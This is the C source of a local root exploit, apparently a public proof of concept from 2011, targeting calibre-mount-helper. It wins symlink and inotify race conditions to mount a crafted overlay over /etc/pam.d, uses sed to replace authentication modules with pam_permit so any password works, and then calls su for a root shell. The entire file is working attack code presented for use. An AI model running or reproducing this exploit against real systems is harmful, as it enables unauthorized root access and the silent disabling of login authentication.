/* * ######################################################## * # .80 Calibrer Assault Mount # * # by zx2c4 # * ######################################################## * * Yesterday's assult mount used inotify to mount into /etc/pam.d. Today we * expand the attack by adding a race toggler so we can mount from non-block * devices. * * Enjoy. * * - zx2c4 * 2011-11-4 * * greets to djrbliss * */ #include #include #include #include #include int main(int argc, char **argv) { printf("########################################################\n"); printf("# .80 Calibrer Assault Mount #\n"); printf("# by zx2c4 #\n"); printf("########################################################\n\n"); printf("[+] Cleaning up old cruft.\n"); unlink("/dev/shm/overlay"); system("calibre-mount-helper cleanup /dev/ram0 /media/staging/"); printf("[+] Creating overlay container.\n"); system("dd if=/dev/zero of=/dev/shm/overlay count=25600"); system("/usr/sbin/mkfs.ntfs /dev/shm/overlay"); printf("[+] Mounting staging using race condition toggler...\n"); int childpid = fork(); if (childpid) { int ret; while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /media/staging/ 2>&1")) == 256 || ret == 8192); kill(childpid, SIGKILL); } else { while (1) { rename("/dev/shm/overlay", "/dev/shm/overlay-holder"); symlink("/dev/ram0", "/dev/shm/overlay"); unlink("/dev/shm/overlay"); rename("/dev/shm/overlay-holder", "/dev/shm/overlay"); } return 0; } printf("[+] Preparing overlay with /etc/pam.d modification:\n"); system("cp -v /etc/pam.d/* /media/staging/"); system("sed -i \"s/pam_deny.so/pam_permit.so/g\" /media/staging/common-auth"); system("sed -i \"s/pam_cracklib.so.*/pam_permit.so/g\" /media/staging/system-auth"); system("sed -i \"s/pam_unix.so.*/pam_permit.so/g\" /media/staging/system-auth"); printf("[+] Mounting overlay over /etc/pam.d using race condition toggler and inotify...\n"); childpid = fork(); if (childpid) { int childpid2 = fork(); if (childpid2) { int ret; while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /etc/pam.d/ 2>&1")) == 256 || ret == 8192); kill(childpid, SIGKILL); kill(childpid2, SIGKILL); } else { while (1) { int fd; fd = inotify_init(); unlink("/media/staging/fake"); mkdir("/media/staging/fake"); inotify_add_watch(fd, "/media/staging/fake", IN_CREATE); read(fd, 0, 0); rename("/media/staging/fake", "/media/staging/tmp"); symlink("/etc/pam.d", "/media/staging/fake"); rmdir("/media/staging/tmp"); close(fd); } } } else { while (1) { rename("/dev/shm/overlay", "/dev/shm/overlay-holder"); symlink("/dev/ram0", "/dev/shm/overlay"); unlink("/dev/shm/overlay"); rename("/dev/shm/overlay-holder", "/dev/shm/overlay"); } return 0; } printf("[+] Asking for root. When prompted for a password, type anything and press enter.\n"); system("su"); return 0; }